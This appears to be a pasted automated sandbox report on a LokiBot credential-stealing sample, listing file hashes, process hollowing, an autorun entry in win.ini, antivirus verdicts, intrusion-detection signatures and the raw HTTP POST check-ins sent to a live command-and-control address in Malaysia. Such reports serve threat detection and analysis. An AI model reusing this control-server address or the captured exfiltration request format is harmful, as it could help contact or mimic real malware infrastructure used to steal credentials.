Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: "Loki"
- * MalScore: 10.0
- * File Name: "Exes_b291aa7c12235281eb62987999f7a25c.exe"
- * File Size: 643072
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "8892d6a52fe967544b572982a24528b9dbcc513a51c350588fdfb5f5ebb30593"
- * MD5: "b291aa7c12235281eb62987999f7a25c"
- * SHA1: "0894b3fbf57578e474256c86650c8fb1f8eb6e41"
- * SHA512: "04f3ba2bc118df5765680d32eca03cd93429a8e8dde2e28489275f538358043a3d55b57c4b5e3a051bafc77a2910ae51554cc9e01fe2576978c815cc80705ec9"
- * CRC32: "BB0986CF"
- * SSDEEP: "12288:R6F+5vH/aqXX9MII5e5wdTFTqr51YggtE:SMqqHa5ywHTqHPgt"
- * Process Execution:
- "HGJN3.exe"
- * Executed Commands:
- "\"C:\\Users\\user\\AppData\\Local\\Temp\\HGJN3.exe\""
- * Signatures Detected:
- "Description": "Behavioural detection: Executable code extraction",
- "Details":
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "http_version_old": "HTTP traffic uses version 1.0"
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- "suspicious_request": "http://101.99.90.11/lok/second/boy/fre.php"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://101.99.90.11/lok/second/boy/fre.php"
- "Description": "The binary likely contains encrypted or compressed data.",
- "Details":
- "section": "name: .text, entropy: 7.76, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x00085000, virtual_size: 0x00084ee0"
- "section": "name: .rsrc, entropy: 7.42, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ, raw_size: 0x00016000, virtual_size: 0x00015374"
- "Description": "Behavioural detection: Injection (Process Hollowing)",
- "Details":
- "Injection": "HGJN3.exe(3880) -> None(9384)"
- "Description": "Executed a process and injected code into it, probably while unpacking",
- "Details":
- "Injection": "HGJN3.exe(3880) -> None(9384)"
- "Description": "Behavioural detection: Injection (inter-process)",
- "Details":
- "Description": "Installs itself for autorun at Windows startup",
- "Details":
- "file": "C:\\Windows\\win.ini"
- "file": "C:\\Windows\\win.ini"
- "Description": "CAPE detected the Loki malware family",
- "Details":
- "Description": "File has been identified by 18 Antiviruses on VirusTotal as malicious",
- "Details":
- "Malwarebytes": "Spyware.AgentTesla"
- "VIPRE": "Trojan.Win32.Generic!BT"
- "Cybereason": "malicious.bf5757"
- "Symantec": "ML.Attribute.HighConfidence"
- "APEX": "Malicious"
- "Paloalto": "generic.ml"
- "Rising": "Trojan.Injector!1.B459 (CLASSIC)"
- "Invincea": "heuristic"
- "McAfee-GW-Edition": "BehavesLike.Win32.Generic.jc"
- "Trapmine": "malicious.moderate.ml.score"
- "FireEye": "Generic.mg.b291aa7c12235281"
- "Endgame": "malicious (high confidence)"
- "Microsoft": "Trojan:Win32/Wacatac.B!ml"
- "ESET-NOD32": "a variant of Win32/Injector.EGVX"
- "SentinelOne": "DFI - Suspicious PE"
- "eGambit": "Unsafe.AI_Score_80%"
- "CrowdStrike": "win/malicious_confidence_60% (D)"
- "Qihoo-360": "HEUR/QVM03.0.7F6B.Malware.Gen"
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET TROJAN LokiBot User-Agent (Charon/Inferno)"
- "signature": "ET TROJAN LokiBot Fake 404 Response"
- "signature": "ET TROJAN LokiBot Checkin"
- "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M2"
- "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M1"
- "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1"
- "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2"
- * Started Service:
- * Mutexes:
- "CicLoadWinStaWinSta0",
- "Local\\MSCTF.CtfMonitorInstMutexDefault1"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\~DFAF4EB26F9C2BBF88.TMP",
- "C:\\Windows\\win.ini"
- * Deleted Files:
- * Modified Registry Keys:
- * Deleted Registry Keys:
- * DNS Communications:
- * Domains:
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 2,
- "body": "",
- "uri": "http://101.99.90.11/lok/second/boy/fre.php",
- "user-agent": "Mozilla/4.08 (Charon; Inferno)",
- "method": "POST",
- "host": "101.99.90.11",
- "version": "1.0",
- "path": "/lok/second/boy/fre.php",
- "data": "POST /lok/second/boy/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 101.99.90.11\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 88A95348\r\nContent-Length: 176\r\nConnection: close\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://101.99.90.11/lok/second/boy/fre.php",
- "user-agent": "Mozilla/4.08 (Charon; Inferno)",
- "method": "POST",
- "host": "101.99.90.11",
- "version": "1.0",
- "path": "/lok/second/boy/fre.php",
- "data": "POST /lok/second/boy/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 101.99.90.11\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 88A95348\r\nContent-Length: 149\r\nConnection: close\r\n\r\n",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- "country_name": "Malaysia",
- "ip": "101.99.90.11",
- "inaddrarpa": "",
- "hostname": ""
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement